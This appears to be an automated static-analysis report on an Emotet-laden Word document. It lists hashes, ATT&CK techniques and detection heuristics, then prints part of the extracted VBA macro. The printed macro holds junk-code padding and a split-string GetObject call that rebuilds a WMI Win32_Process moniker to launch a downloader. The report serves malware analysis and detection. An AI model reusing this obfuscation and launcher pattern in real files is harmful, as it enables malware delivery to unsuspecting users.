Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 9f257f5bce024153…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 308.4 KB
Created: 2019-02-18 08:21:00
Authoring application: Microsoft Office Word
First seen: 2019-05-10
MD5: 1579a5a63f4292777d1643e2a6a5105f
SHA-1: f660f2fd6c8aaa0109eb7b0b658bc572ca2ec29f
SHA-256: 9f257f5bce02415376599bd296f90cc0e4550ca638ccbdd9ce2de0bce4c0ee07
Risk Score: 302

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1105 Ingress Tool Transfer

The sample is a malicious Office document containing VBA macros. The macros use obfuscated API calls, specifically reassembling the 'winmgmts' moniker from split string literals in order to interact with WMI. This is used to launch a process, which is characteristic of a downloader attempting to fetch and execute a second-stage payload. ClamAV detection further confirms its malicious nature, identifying it as Emotet.

Heuristics (8)

  • ClamAV: Doc.Downloader.Emotet-6861363-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6861363-0
  • VBA macros detected [medium, 4 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher [critical] (OLE_VBA_WMI_PROCESS_CREATE)
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals [critical] (OLE_VBA_SPLIT_KEYWORD_OBFUSCATION)
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • GetObject call [high] (OLE_VBA_GETOBJ)
    GetObject call
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 58508 bytes
SHA-256: 664ea8f24f244a0d7a8ed792d46f3c74f0c6cd7378787f3dba71620a982eaaa1
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "V_230_9"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "w098_247"
Function c8_5444()
   If a3_026_ <> O2__261_ Then
      T96_10 = (770826318)
    n472_1 = w42_8__ * 532545034 + Q__267 + CLng(n26_155)
n_1__8 = 881043409 / Hex(q3__750 / Chr(G70___8 - CDate(287670832)) * 416167380 / 117445345) / p0_020 - Fix(375600404)
W_1_919 = (999272155)
End If
   If G5_66_84 <> a_674_5 Then
      i0_88966 = (288240159)
    z88_85 = V_01__50 * 957405764 + T06_633 + CLng(m174_3)
V0___78_ = 926065785 / Hex(i4_78917 / Chr(F969_26 - CDate(421213212)) * 384465904 / 232963777) / R45__93 - Fix(916882504)
i331_8_ = (644105090)
End If
   If K_68_7 <> J3_4_3_ Then
      S6_778 = (825579811)
    n57_2049 = j_49_4 * 333550705 + t4994_3 + CLng(b0682_09)
D5_429 = 14273255 / Hex(q_4304 / Chr(I_3__251 - CDate(371285898)) * 904406205 / 49191880) / v551_4_ - Fix(997730205)
N_1_258_ = (319918674)
End If
   If N76667_7 <> r92727__ Then
      p9560990 = (727845325)
    v7_63311 = l_6__51 * 282799733 + X87_921 + CLng(s3_22_24)
R__7420_ = 493304185 / Hex(c69246_ / Chr(F354_7__ - CDate(298882482)) * 960605033 / 836095279) / V__014__ - Fix(124294691)
V5_21_83 = (318486739)
End If
   If P03_04 <> a86_1_6 Then
      i989548_ = (242748586)
    l_3__097 = k_0_1_8_ * 219892311 + m0_0__ + CLng(f_6949_)
n63____ = 665307247 / Hex(S5_31_9_ / Chr(G3_02__ - CDate(290535591)) * 324560574 / 459625322) / f___94 - Fix(984765805)
C__929_6 = (810789911)
End If
   If z5_79_1 <> S550501 Then
      z3_142 = (393722264)
    P055689_ = B2434_ * 621186981 + V0_877_2 + CLng(G_2230_1)
r285__20 = 996005834 / Hex(f87115 / Chr(t77__36_ - CDate(31842505)) * 50636445 / 489471890) / d0253997 - Fix(342101052)
H_8301 = (164840102)
End If
   If n76_221 <> A6703_ Then
      Y607248 = (824657245)
    N__3727_ = z697__66 * 532697624 + I791_2 + CLng(L_1_4_6)
v6345962 = 804960786 / Hex(N_25__28 / Chr(l_545_ - CDate(961294191)) * 448017715 / 391645398) / d9824_ - Fix(845945265)
v__766 = (769996121)
End If
   If c_8403 <> D4239_ Then
      L5_460 = (527045217)
    l__832 = b1_1_8 * 217421107 + A4__7_8 + CLng(A34__4_)
U60_2_12 = 932873322 / Hex(O____0 / Chr(N4146_22 - CDate(946083372)) * 737979609 / 213364163) / u8___3 - Fix(104734780)
U_212474 = (882317989)
End If
   If j875_77 <> G1_467 Then
      F5583268 = (381361977)
    d_3__0 = i2_7_35 * 682618047 + b_2_29_ + CLng(Y61_77)
M_4_801_ = 868256638 / Hex(V6_782_2 / Chr(k9_1031 - CDate(522084028)) * 336796051 / 251930872) / O2_88_3 - Fix(14802368)
L_799_ = (551758991)
End If
End Function
Function i889__78(S82__2, F5856__)
On Error Resume Next
   If f70__0 <> i727_05 Then
      C_88_0 = (701666692)
    z4__7_ = z2_7_6_ * 546319801 + l84_3143 + CLng(f0__070)
m1425_4 = 577281025 / Hex(S018__ / Chr(G1_947 - CDate(842215600)) * 52234016 / 304424525) / o7_1_9_7 - Fix(463787604)
z7911_ = (589730947)
End If
   If G_0_2_ <> c20_0_5 Then
      w421944_ = (296616127)
    E4998618 = N8194_ * 118709690 + a01_88 + CLng(a861_1)
O7235__ = 812397113 / Hex(n16553_2 / Chr(B61175 - CDate(503602961)) * 23250855 / 113007599) / Y72_81_ - Fix(864357150)
M4___033 = (214042891)
End If
   If s58_328 <> p49_29 Then
      m7___64 = (960155993)
    p____5 = k082593_ * 870771264 + t9_1___ + CLng(s_5_7__)
t4474__ = 846662617 / Hex(P__8_7 / Chr(z_2344_1 - CDate(792345129)) * 318363887 / 744747551) / t001446 - Fix(325817288)
z39___ = (367146655)
End If
Set d2_098 = GetObject("winmgm" + "ts:Win" + "32_Proce" + "ssStartup")
   If Y0_4_45 <> p780094_ Then
      U__449_ = (100599222)
    V_6437_ = N_894_61 * 816378391 + i01_1887 + CLng(A2278_2)
N0___0_ = 308482676 / Hex(v9_67_0 / Chr(M9_8_44 - CDate(849772435)) * 415642489 / 163288231) / N_4720_3 - Fix(225637322)
u_811_ = (614632411)
End If
   If w94_86 <> S6008_3_ Then
      s599__ = (378927899)
    R61_58 = z6__
... (truncated)